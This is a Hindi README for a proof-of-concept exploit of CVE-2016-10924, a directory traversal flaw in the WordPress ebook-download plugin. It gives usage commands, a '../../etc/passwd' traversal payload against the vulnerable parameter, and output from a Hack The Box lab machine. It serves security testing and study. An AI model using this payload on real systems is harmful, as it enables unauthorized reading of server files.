
Proof-of-Concept (PoC) एक्सप्लॉइट स्क्रिप्ट जो WordPress प्लगइन ebook-download (संस्करण < 1.2) में पाई गई Directory Traversal भेद्यता (CVE-2016-10924) के लिए है। यह भेद्यता एक क्राफ्टेड GET अनुरोध के माध्यम से अनधिकृत फ़ाइल पठन की अनुमति देती है।
इस रिपॉज़िटरी में Directory Traversal भेद्यता (CVE-2016-10924) के लिए एक प्रूफ-ऑफ-कॉन्सेप्ट (PoC) एक्सप्लॉइट स्क्रिप्ट है, जो WordPress प्लगइन ebook-download (संस्करण < 1.2) में पाई गई थी।
यह भेद्यता एक क्राफ्टेड GET अनुरोध के माध्यम से अनधिकृत फ़ाइल पठन की अनुमति देती है। यह एक्सप्लॉइट लक्ष्य सर्वर पर डायरेक्ट्री ट्रैवर्सल करने के लिए ebookdownloadurl नामक पैरामीटर का उपयोग करता है।
ebook-download प्लगइन < 1.2ebookdownloadurl पैरामीटर में फ़ाइल पथ में हेरफेर करके अंतर्निहित ऑपरेटिंग सिस्टम पर /etc/passwd जैसी मनमानी फ़ाइलें पढ़ सकते हैं।नोट: यह PoC केवल शैक्षिक और अधिकृत परीक्षण उद्देश्यों के लिए है। इस जानकारी का दुरुपयोग कानूनी परिणामों का कारण बन सकता है।
requests लाइब्रेरी (pip install requests से इंस्टॉल करें)रिपॉज़िटरी क्लोन करें:
git clone https://github.com/your-user/CVE-2016-10924-POC.git
cd CVE-2016-10924-POC
निर्भरताएँ इंस्टॉल करें:
pip install requests
एक्सप्लॉइट चलाएँ:
python3 cve-2016-10924.py "http://TARGET/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl="
पढ़ने के लिए फ़ाइल पथ निर्दिष्ट करें: स्क्रिप्ट लॉन्च करने के बाद, आपसे फ़ाइल पथ पूछा जाएगा। उदाहरण के लिए:
../../../../../../../../../etc/passwd
लक्ष्य वातावरण में वेबरूट स्थान के आधार पर आपको ../ की संख्या समायोजित करने की आवश्यकता हो सकती है।
बाहर निकलें:
exit, quit टाइप करें, या खाली प्रॉम्प्ट पर Enter दबाएँ।मैंने इस एक्सप्लॉइट का उपयोग "Backdoor" पर किया, जो एक सेवानिवृत्त Hack The Box मशीन है:
$ python3 cve-2016-10924.py "http://backdoor.htb/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl="
[*] Enter file paths (e.g. ../../../../../etc/passwd). Type 'exit' to quit.
Enter File path: ../../../../../../../../../etc/passwd
[*] Target URL: http://backdoor.htb/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../../../../../../../etc/passwd
[+] Status Code: 200
[+] File Content:
root:x:0:0:root:/root:/bin/bash
...
यह प्रोजेक्ट केवल शैक्षिक और वैध सुरक्षा परीक्षण उद्देश्यों के लिए है।
इस रिपॉज़िटरी में मौजूद जानकारी या स्क्रिप्ट का उपयोग किसी भी ऐसी प्रणाली पर न करें जिसके परीक्षण के लिए आपके पास स्पष्ट अनुमति नहीं है।
इस टूल के कारण हुए किसी भी दुरुपयोग या क्षति के लिए लेखक और योगदानकर्ता जिम्मेदार नहीं हैं।
यह प्रोजेक्ट GNU 2.0 लाइसेंस के अंतर्गत लाइसेंस प्राप्त है। इसे उपयोग और संशोधित करने के लिए स्वतंत्र महसूस करें, लेकिन कृपया श्रेय दें।
संदर्भ